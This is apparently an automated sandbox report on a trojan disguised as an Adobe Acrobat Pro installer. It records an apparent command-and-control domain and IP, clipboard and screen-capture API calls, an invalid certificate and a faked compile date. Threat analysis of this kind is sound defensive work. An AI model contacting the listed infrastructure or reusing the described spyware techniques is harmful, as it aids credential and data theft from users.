Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://ocsp.digicert.com0H
Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://ocsp.digicert.com0I
Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418506061.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sobrattyeu.bond/
Source: Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418506061.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sobrattyeu.bond/$I
Source: Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418794344.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sobrattyeu.bond/432T)
Source: Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418506061.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp, Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418794344.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sobrattyeu.bond/api
Source: Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418794344.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sobrattyeu.bond/apir
Source: Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418794344.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sobrattyeu.bond/pit(
Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49808 version: TLS 1.2

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Code function: 1_2_004354B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_004354B0

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Code function: 1_2_004354B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_004354B0

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Code function: 1_2_00435660 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

1_2_00435660

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00424050	1_2_00424050
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00409921	1_2_00409921
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0042EBAA	1_2_0042EBAA
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_004343BB	1_2_004343BB
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0041AC58	1_2_0041AC58
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00409460	1_2_00409460
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_004084E0	1_2_004084E0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_004204E0	1_2_004204E0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0040D4F2	1_2_0040D4F2
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00441570	1_2_00441570
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0043A530	1_2_0043A530
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_004116D0	1_2_004116D0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0040DE81	1_2_0040DE81
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00441F40	1_2_00441F40
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0041DF60	1_2_0041DF60
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_004277C0	1_2_004277C0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0043A7A0	1_2_0043A7A0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00401040	1_2_00401040
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0041405B	1_2_0041405B
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00406070	1_2_00406070
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0041600C	1_2_0041600C
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00405810	1_2_00405810
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00403830	1_2_00403830
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00414830	1_2_00414830
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_004090B0	1_2_004090B0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0041C0B0	1_2_0041C0B0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_004210B0	1_2_004210B0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00434949	1_2_00434949
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0042294C	1_2_0042294C
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0040E95A	1_2_0040E95A
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00440960	1_2_00440960
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00441930	1_2_00441930
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0042E9C5	1_2_0042E9C5
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0043B9D0	1_2_0043B9D0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0041A1DC	1_2_0041A1DC
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_004041E0	1_2_004041E0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_004291E0	1_2_004291E0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_004329F5	1_2_004329F5
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0041C990	1_2_0041C990
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0040A9A0	1_2_0040A9A0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_004339AE	1_2_004339AE
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00440A50	1_2_00440A50
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00428A7F	1_2_00428A7F
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0042C210	1_2_0042C210
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00435230	1_2_00435230
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00424AC0	1_2_00424AC0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_004072E0	1_2_004072E0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00427AF0	1_2_00427AF0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00413A92	1_2_00413A92
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_004152B4	1_2_004152B4
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00411356	1_2_00411356
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00440B60	1_2_00440B60
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00404B10	1_2_00404B10
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0042DBC8	1_2_0042DBC8
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00410BCA	1_2_00410BCA
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00427BDF	1_2_00427BDF
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_004263E6	1_2_004263E6
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0041B3F0	1_2_0041B3F0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0043BBA7	1_2_0043BBA7
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00420BB0	1_2_00420BB0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0042DC59	1_2_0042DC59
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0043B400	1_2_0043B400
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00440C10	1_2_00440C10
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00441C30	1_2_00441C30
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00405CD0	1_2_00405CD0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0042DCD8	1_2_0042DCD8
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00438CE4	1_2_00438CE4
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0042DCEB	1_2_0042DCEB
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00439CF0	1_2_00439CF0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_004394F4	1_2_004394F4
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0042F490	1_2_0042F490
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00416C9D	1_2_00416C9D
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00419570	1_2_00419570
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00430D7A	1_2_00430D7A
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00437D7D	1_2_00437D7D
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00406500	1_2_00406500
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0041BD20	1_2_0041BD20
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00424D86	1_2_00424D86
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00408DB0	1_2_00408DB0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0041F640	1_2_0041F640
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0040AE20	1_2_0040AE20
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00402E20	1_2_00402E20
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0040E6E0	1_2_0040E6E0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0042EEF7	1_2_0042EEF7
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00418690	1_2_00418690
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00426F60	1_2_00426F60
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0041C720	1_2_0041C720
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0041572C	1_2_0041572C
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00428F3B	1_2_00428F3B
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0040C7F5	1_2_0040C7F5
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00424780	1_2_00424780
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0043DF80	1_2_0043DF80

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: String function: 00407E70 appears 49 times
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: String function: 00413A70 appears 109 times

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 908

Source: Adobe-Acrobat-Pro-2025.exe

Static PE information: invalid certificate

Source: Adobe-Acrobat-Pro-2025.exe, 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHandler.exe0 vs Adobe-Acrobat-Pro-2025.exe
Source: Adobe-Acrobat-Pro-2025.exe, 00000000.00000000.2170361115.0000000000012000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHandler.exe0 vs Adobe-Acrobat-Pro-2025.exe
Source: Adobe-Acrobat-Pro-2025.exe, 00000000.00000002.2331684567.000000000072E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Adobe-Acrobat-Pro-2025.exe
Source: Adobe-Acrobat-Pro-2025.exe	Binary or memory string: OriginalFilenameHandler.exe0 vs Adobe-Acrobat-Pro-2025.exe

Source: Adobe-Acrobat-Pro-2025.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: Adobe-Acrobat-Pro-2025.exe

Static PE information: Section: .idata ZLIB complexity 1.0003350020226538

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/5@1/1

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Code function: 1_2_0043A7A0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

1_2_0043A7A0

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5768

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\035fe8d4-bfbc-45e6-9297-1d12edd5538f

Jump to behavior

Source: Adobe-Acrobat-Pro-2025.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Adobe-Acrobat-Pro-2025.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Adobe-Acrobat-Pro-2025.exe

ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

File read: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe "C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe"
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process created: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe "C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe"
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 908
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process created: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe "C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Adobe-Acrobat-Pro-2025.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Adobe-Acrobat-Pro-2025.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Adobe-Acrobat-Pro-2025.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.Windows.Forms.pdb source: WERD9A3.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb/^ source: WERD9A3.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WERD9A3.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WERD9A3.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WERD9A3.tmp.dmp.5.dr
Source:	Binary string: System.Windows.Forms.pdb< source: WERD9A3.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERD9A3.tmp.dmp.5.dr
Source:	Binary string: Manjohn.pdb source: Adobe-Acrobat-Pro-2025.exe, WERD9A3.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WERD9A3.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WERD9A3.tmp.dmp.5.dr

Source: Adobe-Acrobat-Pro-2025.exe

Static PE information: 0xECEDE332 [Sun Dec 18 02:19:30 2095 UTC]

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_004488FD pushad ; iretd	1_2_004488FE
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00444976 push ds; retf	1_2_00444977
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00440900 push eax; mov dword ptr [esp], B5B4BBCAh	1_2_00440904
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00448265 pushfd ; iretd	1_2_00448269
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00449ADB push esp; iretd	1_2_00449AF2
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_00445636 push ebp; ret	1_2_0044564C
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 1_2_0044577C push cs; ret	1_2_00445781

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
